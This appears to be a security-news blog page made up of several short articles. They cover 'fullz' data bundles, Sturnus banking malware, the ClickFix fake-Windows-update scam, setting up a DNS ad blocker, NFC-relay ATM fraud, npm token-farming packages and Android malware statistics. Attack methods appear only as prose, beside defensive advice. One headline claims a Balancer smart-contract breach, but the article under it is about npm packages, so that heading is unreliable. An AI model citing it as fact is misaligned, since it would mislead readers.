Williams explains that criminals increasingly rely on AI to pull together stolen data into detailed information bundles called “fullz.” These files can include banking credentials, addresses, medical data, and social security numbers. Scammers use them to impersonate relatives, romantic partners, or trusted contacts in targeted fraud attempts. 

He notes that while highly individualized scams are less common, criminals tend to target groups of victims at scale using dark web data. To understand their level of exposure, experts recommend that consumers start by scanning the dark web for leaked credentials. 

Many password managers and personal data removal services now offer monitoring tools that track whether email addresses, usernames, or passwords have been posted online. Removing data once it appears on dark web marketplaces is extremely difficult, which is why privacy specialists advise minimizing personal information shared online. Williams says reducing digital footprints can make individuals less appealing to attackers. 

Personal data removal services can help scrub information from commercial data broker sites, which can number in the hundreds. Security specialists also emphasize the importance of preventing criminals from expanding access to personal devices or financial accounts. 

Recommended practices include enabling multi-factor authentication, using strong and unique passwords stored in a password manager, installing antivirus software, avoiding links from unknown senders, updating operating systems regularly, and using a VPN on public Wi-Fi. Identity theft protection platforms and credit monitoring services can offer an extra layer of defense and provide real-time alerts if suspicious activity occurs.
Read more »
WhatsApp
AI Cloud malware Social Media Sturnus Telegram WhatsApp

Banking Malware Can Hack Communications via Encrypted Apps


Sturnus hacks communication 

A new Android banking malware dubbed Sturnus can hack interactions from entirety via encrypted messaging networks like Signal, WhatsApp, and Telegram, as well as take complete control of the device.  

While still under growth, the virus is fully functional and has been programmed to target accounts at various financial institutions across Europe by employing "region-specific overlay templates."  

Attack tactic 

Sturnus uses a combination of plaintext, RSA, and AES-encrypted communication with the command-and-control (C2) server, making it a more sophisticated threat than existing Android malware families.

Sturnus may steal messages from secure messaging apps after the decryption step by recording the content from the device screen, according to a research from online fraud prevention and threat intelligence agency Threatfabric. The malware can also collect banking account details using HTML overlays and offers support for complete, real-time access through VNC session.

Malware distribution 

The researchers haven't found how the malware is disseminated but they assume that malvertising or direct communications are plausible approaches. Upon deployment, the malware connects to the C2 network to register the target via a cryptographic transaction. 

For instructions and data exfiltration, it creates an encrypted HTTPS connection; for real-time VNC operations and live monitoring, it creates an AES-encrypted WebSocket channel. Sturnus can begin reading text on the screen, record the victim's inputs, view the UI structure, identify program launches, press buttons, scroll, inject text, and traverse the phone by abusing the Accessibility services on the device.

To get full command of the system, Sturnus gets Android Device Administrator credentials, which let it keep tabs of password changes and attempts to unlock and lock the device remotely. The malware also tries to stop the user from disabling its privileges or deleting it from the device. Sturnus uses its permissions to identify message content, inputted text, contact names, and conversation contents when the user accesses WhatsApp, Telegram, or Signal.

Read more »
Windows update scam
browser fullscreen scam ClickFix Cybersecurity Warning fake Windows update attack malware Windows update scam

Hackers Use Fake Windows Update Screen to Trick Users Into Running Malware Commands

 

A new cyberattack is circulating online, disguising itself as a legitimate Windows update in an effort to deceive users into executing harmful commands that can lead to malware installation.

Daniel B., a cybersecurity researcher with the UK’s National Health Service, discovered the scheme while examining malicious activity online. According to his findings, the operation has been active for about a month on the domain groupewadesecurity[.]com. When users visit the site, their computer—or even their smartphone—may suddenly display what looks like a genuine Windows update blue screen. This screen urges them to complete several keyboard steps.

In reality, the update screen is entirely fraudulent. It’s delivered through the browser and relies on the Fullscreen API to cover the entire display, creating the illusion of a system-level update. The interface then instructs users to press the Windows key along with the R key, which opens the Run dialog box on Windows systems. Meanwhile, the website silently places malicious commands onto the user’s clipboard.

The next prompt tells the user to hit “CTRL + V” to paste—and then press Enter. Anyone who follows these steps unknowingly triggers a command instructing Windows to execute code hosted on the attacker-controlled domain.

This attack is a fresh spin on the ongoing “ClickFix” technique, which has been used for roughly a year to manipulate users into running commands that install malware. Previous ClickFix campaigns have appeared as fake CAPTCHA pages, counterfeit Chrome error messages, and bogus government portals. The method continues to evolve in pursuit of new ways to lure victims. As Daniel B. noted, “The more recent ClickFix campaigns like these fake Windows update pages are a powerful reminder that user vigilance and cybersecurity awareness training are just as critical as technical defenses.”

Thankfully, the attack is relatively simple to detect and avoid. No legitimate website or service will ever ask users to perform such system-level commands. Since the fake screen is just a browser tab in full-screen mode, closing the tab or window immediately stops the attack. Chrome also helps by prompting users to press “ESC” whenever the browser enters full-screen mode unexpectedly.

Despite this, cybersecurity firms say ClickFix-related campaigns are rising sharply. Because the user is the one unknowingly triggering the malicious code, traditional antivirus tools often fail to catch the threat. As ESET warned in June, "The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors."
Read more »
Pi-hole setup
ad blocking DNS AdGuard Home block ads on wifi malware malware protection network wide ad blocker Pi-hole setup

How to Block Ads Across Your Entire Home Network and Reduce Online Threats

 

In today’s hyper-connected world, ads have become nearly impossible to escape. From phones and laptops to smart TVs, every screen you own is constantly serving you promotional content. And while most ads are simply irritating, some can be genuinely harmful. A single malicious advertisement can expose your device to malware or ransomware — a nightmare for anyone who has experienced it firsthand.

Browser extensions like uBlock Origin can help, but they only work on specific devices and compatible browsers. Your TV, your secondary phone, or a browser without extension support won’t benefit from them. So the real question becomes: how do you block ads everywhere, all at once?

The answer is to block ads across your entire home network, so every device connected to your Wi-Fi automatically gains protection. Below are two effective ways to make that happen.

1. Switch to Ad-Blocking DNS on Your Router

For most people, this is the easiest and fastest solution. Home routers typically assign IP addresses and DNS settings through DHCP. By default, these DNS servers often come from your ISP — and they usually offer no security or privacy enhancements.

By changing the DNS settings in your router, you can route all traffic through ad-blocking DNS servers instead. Popular options include:

  • AdGuard DNS: Blocks ads, trackers and malicious domains. Family-safe filters (including adult-content restrictions) are also available.

  • NextDNS: Highly customizable, allowing advanced filtering and custom blocklists.

  • ControlD: Offers personalized DNS profiles with built-in ad blocking.

DNS addresses you can use:
NextDNS: 45.90.28.152 and 45.90.30.152
AdGuard DNS: 94.140.14.14 and 94.140.15.15
ControlD: 76.76.2.2 and 76.76.10.2

To apply this, log into your router (usually at 192.168.1.1 or 192.168.1.254), find the DNS section, and replace your existing DNS entries with the ones above. Ensure all devices are set to use DHCP, so they automatically pick up the new ad-blocking DNS settings.

If you prefer configuring individual devices instead of your entire network, you can manually set these DNS servers on your phone, laptop, or tablet.

2. Install a Dedicated Network-Wide Ad Blocker

If you want stronger filtering and more control, consider running a dedicated ad-blocking system using a spare computer or a Raspberry Pi. The two most trusted tools for this are Pi-hole and AdGuard Home.

Here’s a quick overview of installing AdGuard Home:

You can install it manually or in a container, but the manual method is beginner-friendly:

  1. Download the latest AdGuard Home release for your operating system from the official GitHub page.

  2. Extract the ZIP file.

  3. Windows users: Open a terminal as administrator, navigate to the folder using cd, and run:
    AdGuardHome.exe -s install

  4. Linux/macOS users: Navigate to the extracted directory and run:
    sudo ./AdGuardHome -s install

Once installed, open a browser on your home network and go to:
(Replace SERVER with the IP address of the device running the software.) Follow the on-screen setup to finish configuration.

If you want instant results with minimal effort, start by switching your router to ad-blocking DNS. If you need deeper protection and detailed customization, a dedicated blocker like Pi-hole or AdGuard Home delivers far more power.

Either way, these methods can dramatically reduce ads across your home network — and make every device you own safer and cleaner to use.

Read more »
pins
Android ATM Banks debit cards Financial Breach malware NFC pins

New Android Malware Steals Debit Card Data And PINs To Enable ATM Withdrawals

 




Security researchers have identified an Android malware operation that can collect debit card details and PINs directly from a victim’s mobile device and use that information to withdraw cash from an ATM. What makes this attack particularly dangerous is that criminals never need to handle the victim’s physical bank card at any point. Instead, the entire theft is carried out through the victim’s compromised phone, wireless communication features, and a coordinated cashout attempt at an ATM.

The threat relies on a combination of social engineering and near field communication, a short-range wireless feature widely used for contactless payments on smartphones and payment cards. Once the malware is in place, it quietly monitors NFC activity on the compromised phone, captures the temporary transaction data, and sends this information to an accomplice positioned near an ATM. Because these NFC codes change quickly and are valid only for a short period, the cash withdrawal must be carried out almost immediately for the fraud to succeed.

The attackers cannot begin the operation until they convince the target to install the malicious application. To achieve this, they commonly send deceptive text messages or emails that pretend to come from a bank. These messages warn the user about false account issues or security concerns and direct them to install an app from a link. Victims are sometimes contacted through follow-up calls to reinforce the urgency and to make the request appear more legitimate. The app itself does not come from an official store and often asks for permissions it does not need, including access to financial inputs. Once a user enters their card information and PIN, the malware is ready to operate in the background.

When the victim completes a contactless transaction on their phone, the malware intercepts the NFC exchange and sends the captured data to the waiting accomplice. That person uses a phone or smartwatch to simulate the victim’s payment credential at a nearby ATM and withdraws money before the dynamic code becomes invalid. Because all steps are interconnected and time sensitive, the criminals typically coordinate their roles in advance.

This technique stands out because it exploits features designed for convenience. It does not rely on physical skimming devices or stolen cards. Instead, it abuses trusted communication processes inside the victim’s own device. The combination of fake alerts, misleading calls, unauthorized apps, and wireless data relays makes the attack appear legitimate to those who are not familiar with these tactics.


Practical steps readers should take :

• Only install banking or payment apps from official app stores or verified developer pages.

• Treat unsolicited messages or calls claiming to be from your bank as suspicious; verify alerts using the phone number printed on your card or official statements.

• Never share card numbers or PINs in response to unsolicited contacts.

• Review installed apps and revoke permissions for unknown or unnecessary apps, particularly those that request accessibility or payment access.

• Use reputable mobile security software and keep the device and apps updated; some security products can detect malicious installers and block phishing links. 

• Any suspicious alerts should be verified by contacting the bank using official phone numbers printed on cards or statements.


As cybercriminals continue to grow more layered and coordinated attacks, staying informed about these methods is essential. Understanding how such schemes operate can help individuals protect themselves and warn others before they become victims.

Read more »
Token Farming Attack
Automated Attacks Cyber Security Dependency Threats malware NPM malware Open Source Risks Registry Abuse Research Software Integrity supply chain security Token Farming Attack

$116 Million at Risk as Balancer Suffers Major Smart Contract Breach

 

Security experts are becoming increasingly concerned about a developing anomaly in the JavaScript ecosystem after researchers discovered a massive cluster of self-replicating npm packages that seem to have no technical function but instead indicate a well-thought-out and financially motivated scheme. Over 43,000 of these packages—roughly 1% of the whole npm repository—were covertly uploaded over a two-year period using at least 11 synchronized accounts, according to recent research by Endor Labs. 

The libraries automatically reproduce themselves when downloaded and executed, filling the ecosystem with nearly identical code, even though they do not behave like traditional malware—showing no indicators of data theft, backdoor deployment, or system compromise. Investigators caution that even while these packages are harmless at the moment, their size and consistent behavior could serve as a channel for harmful updates in the future. 

With many packages containing tea.yaml files connected to TEA cryptocurrency accounts, early indications also point to a potential monetization plan, indicating the operation may be built to farm tokens at scale. The scope and complexity of the program were exposed by more research in the weeks that followed. 

In late October, clusters of unusual npm uploads were first observed by Amazon's security experts using improved detection algorithms and AI-assisted monitoring. By November 7, hundreds of suspicious packages had been found, and by November 12, over 150,000 malicious entries had been linked to a network of coordinated developer accounts. 

What had started out as a few dubious packages swiftly grew into a huge discovery. They were all connected to the tea.xyz token-farming initiative, a decentralized protocol that uses TEA tokens for staking, incentives, and governance to reward open-source contributions. Instead of using ransomware or credential stealers, the attackers flooded the registry with self-replicating packages that were made to automatically create and publish new versions.

As unwary developers downloaded or interacted with the contaminated libraries, the perpetrators silently accumulated token rewards. Each package was connected to blockchain wallets under the attackers' control by embedded tea.yaml files, which made it possible for them to embezzle profits from lawful community activities without drawing attention to themselves. The event, according to security experts, highlights a broader structural flaw in contemporary software development, where the speed and transparency of open-source ecosystems may be readily exploited at scale. 

Amazon's results show how AI-driven automation has made it easy for attackers to send large quantities of garbage or dangerous goods in a short amount of time, according to Manoj Nair, chief innovation officer at Snyk. He emphasized that developers should use behavior-based scanning and automated dependency-health controls to identify low-download libraries, template-reused content, and abrupt spikes in mass publishing before such components enter their build pipelines, as manual review is no longer sufficient. 

In order to stop similar operations before they start, he continued, registry operators must also change by proactively spotting bulk uploads, duplicate code templates, and oddities in metadata. Suzu CEO Michael Bell shared these worries, claiming that the discovery of 150,000 self-replicating, token-farming npm packages shows why attackers frequently have significantly more leverage when they compromise the development supply chain than when they directly target production systems. 

Bell cautioned that companies need to treat build pipelines and dependency chains with the same rigor as production infrastructure because shift-left security is becoming the standard. This includes implementing automated scans, keeping accurate software bills of materials, enforcing lockfiles to pin trusted versions, and verifying package authenticity before installation. He pointed out that once malicious code enters production, defenders are already reacting to a breach rather than stopping an assault. 

The researchers discovered that by incorporating executable scripts and circular dependency chains into package.json files, the campaign took advantage of npm's installation procedures. In actuality, installing one malicious package set off a planned cascade that increased replication and tea.xyz teaRank scores by automatically installing several more.

The operation created significant risks by flooding the registry with unnecessary entries, taxing storage and bandwidth resources, and increasing the possibility of dependency confusion, even if the packages did not include ransomware or credential-stealing payloads. Many of the packages shared cloned code, had tea.yaml files connecting them to attacker-controlled blockchain wallets, and used standard naming conventions. Amazon recommended that companies assess their current npm dependencies, eliminate subpar or non-functional components, and bolster their supply-chain defenses with separated CI/CD environments and SBOM enforcement. 

The event contributes to an increasing number of software supply-chain risks that have led to the release of new guidelines by government organizations, such as CISA, with the goal of enhancing resilience throughout development pipelines. The campaign serves as a sobering reminder that supply-chain integrity can no longer be ignored as the inquiry comes to an end. The scope of this issue demonstrates how readily automation may corrupt open-source ecosystems and take advantage of community trust for commercial gain if left uncontrolled. 

Stronger verification procedures throughout development pipelines, ongoing dependency auditing, and stricter registry administration are all necessary, according to experts. In addition to reducing such risks, investing in clear information, resilient tooling, and cross-industry cooperation will support the long-term viability of the software ecosystems that contemporary businesses rely on.
Read more »
Spyware
Android Security Data Theft malware Payment Faud Spyware

Android Malware Hits 42 Million Downloads, Risking Mobile Payments

 

Android malware is surging globally, with attackers increasingly targeting mobile payments and IoT devices, exposing critical vulnerabilities in systems heavily relied upon for communication, work, and financial activity. 

Recent findings from Zscaler indicate that 239 malicious Android apps were discovered on Google Play, amassing a staggering 42 million downloads, mainly by users seeking productivity and workflow solutions trusted in hybrid work settings. This reflects a pronounced shift away from traditional card-based fraud toward abuse of mobile payment channels using various social engineering tactics—such as phishing, smishing, and SIM-swapping.

Mobile compromise incidents are escalating rapidly, highlighted by a 67% year-over-year spike in Android malware transactions. Spyware, banking trojans, and adware are the dominant threats, with adware constituting 69% of all malware detections, indicating evolving monetization strategies among cybercriminals while the notorious 'Joker' family has sharply declined to only 23% of activity. The report outlines a trend of attackers focusing on high-value sectors, with the energy industry experiencing a dramatic 387% increase in attack attempts compared to the previous year.

IoT environments remain highly vulnerable, particularly in manufacturing and transportation, which saw over 40% of IoT-related malware activity. IoT attacks are primarily driven by botnet malware families such as Mirai, Mozi, and Gafgyt—collectively responsible for about 75% of observed malicious payloads within this space. Routers, in particular, are heavily targeted, making up 75% of all IoT attacks, as attackers use them for botnet building and proxy networks.

Geographically, India is the prime target for mobile malware, receiving 26% of analyzed attacks, followed by the United States (15%) and Canada (14%). In IoT, the United States is most affected, seeing 54.1% of all malicious traffic. Certain threats like the Android Void backdoor have infected at least 1.6 million Android TV boxes, mostly in India and Brazil, exposing the dangers linked to widespread use of inexpensive devices and outdated software. Malware families like Anatsa and Xnotice continue to refine tactics for financial theft and regional targeting.

To defend against these threats, experts recommend maintaining regularly updated devices, using reputable antivirus apps, enabling ransomware protection, limiting unnecessary app installations, scrutinizing permissions, running frequent malware scans, and utilizing Google Play Protect. The article stresses the need for a "zero trust everywhere" approach combined with AI-driven threat detection to counter the evolving cyber landscape.
Read more »
Subscribe to: Comments (Atom)